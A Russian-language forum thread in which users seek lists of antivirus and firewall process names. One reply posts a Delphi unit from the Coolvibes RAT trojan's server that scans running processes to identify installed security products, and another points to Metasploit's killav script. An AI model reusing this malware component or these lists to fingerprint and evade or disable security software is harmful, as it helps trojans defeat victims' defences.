Народ случаем ни у кого не завалялся список процессов антивирусов и фаеров, а то когда-то видел, а найти не могу. Требуется именно имена исполняемых файлов которые сидят в оперативе. А то давно видел модуль (не помню для какого языка), там они в виде массива были перечислены.
http://process-info.org/library/search/1?q=AntiVirus http://www.tasklist.org/search.php?q=antivir&submit=GO Если нужен самый свежий список процессов, то я бы на твоем месте взял список антивирей и по каждому понаходил бы процессы в инете.
Держи юнит для дельфи от Coolvibes RAT, конечно не полный список, но остальное ручками можно дописать: Code: {Unit perteneciente al server del troyano Coolvibes que contiene funciones para detectar que antivirus y firewall se usa en el sistema} unit unitAvs; interface uses Windows, sysutils, TLHelp32; const Procesos: array[0..15] of String = ('avesvc.exe', 'ashdisp.exe', 'avgcc.exe', 'bdss.exe', 'spider.exe', 'avp.exe', 'nod32krn.exe', 'cclaw.exe', 'dvpapi.exe', 'ewidoctrl.exe', 'mcshield.exe', 'pavfires.exe', 'almon.exe', 'ccapp.exe', 'pccntmon.exe', 'fssm32.exe'); NombreDeAntivirus: array[0..15] of String =('AntiVir', 'Avast Antivirus', 'AVG Antivirus', 'BitDefender', 'Dr.Web', 'Kaspersky Antivirus', 'Nod32', 'Norman', 'Authentium Antivirus', 'Ewido Security Suite', 'McAfee VirusScan', 'Panda Antivirus/Firewall', 'Sophos', 'Symantec/Norton', 'PC-cillin Antivirus', 'F-Secure'); Firewalls: array[0..14] of String = ('issvc.exe', 'vsmon.exe', 'cpf.exe', 'ca.exe', 'tnbutil.exe', 'avp.exe', 'mpfservice.exe', 'npfmsg.exe', 'outpost.exe', 'tpsrv.exe', 'pavfires.exe', 'kpf4ss.exe', 'persfw.exe', 'vsserv.exe', 'smc.exe'); NombreDeFirewall: array[0..14] Of string =('Norton Personal Firewall', 'ZoneAlarm', 'Comodo Firewall', 'eTrust EZ Firewall', 'F-Secure Internet Security', 'Kaspersky Antihacker', 'McAfee Personal Firewall', 'Norman Personal Firewall', 'Outpost Personal Firewall', 'Panda Internet Seciruty Suite', 'Panda Anti-Virus/Firewall', 'Kerio Personal Firewall', 'Tiny Personal Firewall', 'BitDefender / Bull Guard Antivirus', 'Sygate Personal Firewall'); function ObtenerAvs(): String; function ObtenerFirewall(): String; implementation Function Scan(tipo: integer): String; var cLoop :Boolean; CapProcesos:THandle; L :TProcessEntry32; i :integer; Begin Result := 'No encontrado'; CapProcesos := CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS or TH32CS_SNAPMODULE, 0); L.dwSize := SizeOf(L); cLoop := Process32First(CapProcesos, L); while cLoop do begin if tipo = 1 then for i := 0 to 15 do if LowerCase(L.szExeFile) = Procesos[i] then begin If Result = 'No encontrado' then //Osea que no ha copiado nada a result Result := NombreDeAntivirus[i] else //si es diferente de 'No encontrado' es porque ya copiй un av antes Result := Result + ' \ ' + NombreDeAntivirus[i] //copie un separador y el otro antivirus end; if tipo = 2 then for i := 0 to 14 do if LowerCase(L.szExeFile) = Firewalls[i] then begin if Result = 'No encontrado' then Result := NombreDeFirewall[i] else Result := Result + ' \ ' + NombreDeFirewall[i]; end; cLoop := Process32Next(CapProcesos, L); end; CloseHandle(CapProcesos); end; function ObtenerAvs(): String; begin Result := Scan(1); end; function ObtenerFirewall(): String; begin Result := Scan(2); end; end.
hi, http://metasploit.com/svn/framework3/trunk/scripts/meterpreter/killav.rb есть большой список в этом модуле.
